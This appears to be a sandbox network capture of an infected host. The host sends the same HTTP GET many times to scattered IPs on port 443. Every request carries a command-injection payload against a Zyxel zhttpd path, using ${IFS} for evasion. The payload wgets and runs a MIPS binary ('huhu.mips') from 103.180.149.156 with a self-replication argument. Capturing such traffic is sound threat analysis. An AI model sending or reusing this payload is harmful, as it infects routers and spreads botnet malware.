                                                      Feb 2, 2024 06:36:10.003556967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8573192.168.2.1448424107.88.245.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003582001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8574192.168.2.1445516200.148.96.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003618002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8575192.168.2.143697081.220.91.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003667116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8576192.168.2.1454858153.221.182.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003715038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8577192.168.2.1458478143.95.254.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003782034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8578192.168.2.1448626200.185.203.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003810883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8579192.168.2.1443164146.174.251.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003832102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8580192.168.2.1456396194.88.168.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003878117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8581192.168.2.144449677.218.245.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003914118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8582192.168.2.14379765.230.44.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003945112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8583192.168.2.1439926100.128.231.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.003985882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8584192.168.2.1454328223.49.95.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004034996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8585192.168.2.1444632106.5.8.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004077911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8586192.168.2.1458138136.108.188.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004132032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8587192.168.2.1441488167.105.171.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004163027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8588192.168.2.144128623.25.104.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004192114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8589192.168.2.145373641.236.137.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004218102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8590192.168.2.1436986219.153.95.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004262924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8591192.168.2.145219080.118.222.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004295111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8592192.168.2.1442312129.159.62.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004332066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8593192.168.2.1440236193.162.89.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004389048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8594192.168.2.1453130103.28.105.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004422903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8595192.168.2.1459108197.112.246.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004452944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8596192.168.2.144109464.45.91.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004496098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8597192.168.2.1435576129.244.4.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004528999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8598192.168.2.1460592139.34.12.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004590988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8599192.168.2.145710250.140.209.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004607916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8600192.168.2.143678625.113.242.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004640102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8601192.168.2.1459686183.248.228.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004674911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8602192.168.2.1449308184.95.8.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004690886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8603192.168.2.143902488.101.56.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004729033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8604192.168.2.145850876.157.180.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004777908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8605192.168.2.1437116116.219.224.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004803896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8606192.168.2.143338643.151.173.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004827976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8607192.168.2.1453522209.94.108.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004893064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8608192.168.2.143455217.159.40.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004915953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8609192.168.2.1443722186.16.190.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004956007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8610192.168.2.1445984159.148.227.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.004987001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8611192.168.2.144885419.121.113.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005045891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8612192.168.2.14564908.220.102.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005078077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8613192.168.2.1444484182.208.171.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005168915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8614192.168.2.1450592216.0.238.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005207062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8615192.168.2.143378463.182.162.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005249023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8616192.168.2.145851689.77.181.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005294085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8617192.168.2.145634052.142.90.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005320072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8618192.168.2.144919825.8.93.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005357027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8619192.168.2.1440982110.76.79.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005382061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8620192.168.2.1439988218.38.137.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005429029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8621192.168.2.1453366194.38.125.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005464077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8622192.168.2.143894035.2.117.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005486012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8623192.168.2.1448462177.237.179.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005522013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8624192.168.2.1460370190.0.60.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005594969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8625192.168.2.1443834165.72.50.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005631924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8626192.168.2.143590632.69.97.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005673885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8627192.168.2.1447324146.54.112.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005700111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8628192.168.2.1441828144.73.97.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005733013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8629192.168.2.1443194106.74.163.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005790949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8630192.168.2.145068062.61.45.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005831003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8631192.168.2.143654448.255.203.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005850077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8632192.168.2.145556696.165.40.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005877018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8633192.168.2.1451662114.68.54.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005913019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8634192.168.2.1458388104.203.204.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.005968094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8635192.168.2.1446662179.226.105.48443
                                                      TimestampBytes transferredDirectionData
